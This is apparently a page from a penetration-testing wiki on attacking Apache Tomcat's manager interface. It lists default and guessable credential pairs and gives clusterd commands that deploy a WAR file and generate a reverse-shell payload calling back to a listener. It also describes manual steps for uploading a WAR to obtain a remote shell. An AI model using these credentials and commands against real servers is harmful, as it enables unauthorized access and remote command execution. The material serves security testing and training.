-
Notifications
You must be signed in to change notification settings - Fork 198
Tomcat
The Tomcat application server can be attacked through the management interface. This is usually found at the URL /manager/
or /manager/html
on port 8080. We attack Tomcat through known or easily guessable credentials on the management interface. Various levels of insecure defaults can be found in different versions of Tomcat with a trend toward becoming more secure in later versions.
Some credentials to try on the Tomcat manager interface include the following:
tomcat/s3cret
tomcat/tomcat
admin/admin
tomcat/admin
admin/tomcat
admin/password
tomcat/password
admin/
tomcat/
Note that the username does not HAVE to be "admin" or "tomcat" but usually is, this is what most configuration guides use.
If access can be gained to the Tomcat administrative interface, it is trivial to achieve remote command execution (assuming your account has the correct permissions). Again, clusterd can automate this process:
sudo python clusterd.py -o linux -i localhost -p 8080 -a tomcat --usr-auth tomcat:s3cret --deploy shell3.war --deployer manage_deploy --invoke
Note that in the above, shell3.war
was generated using the clusterd command:
sudo python clusterd.py -o windows -a tomcat --gen-payload 127.0.0.1:4444
To perform this same attack manually is trivial. Simply access the manager interface at http://<host>:8080/manager/html
. Scroll down to the "Deploy" section. It offers a function that allows for upload of a WAR file. Once uploaded, simply start the new service, and your reverse shell will be obtained.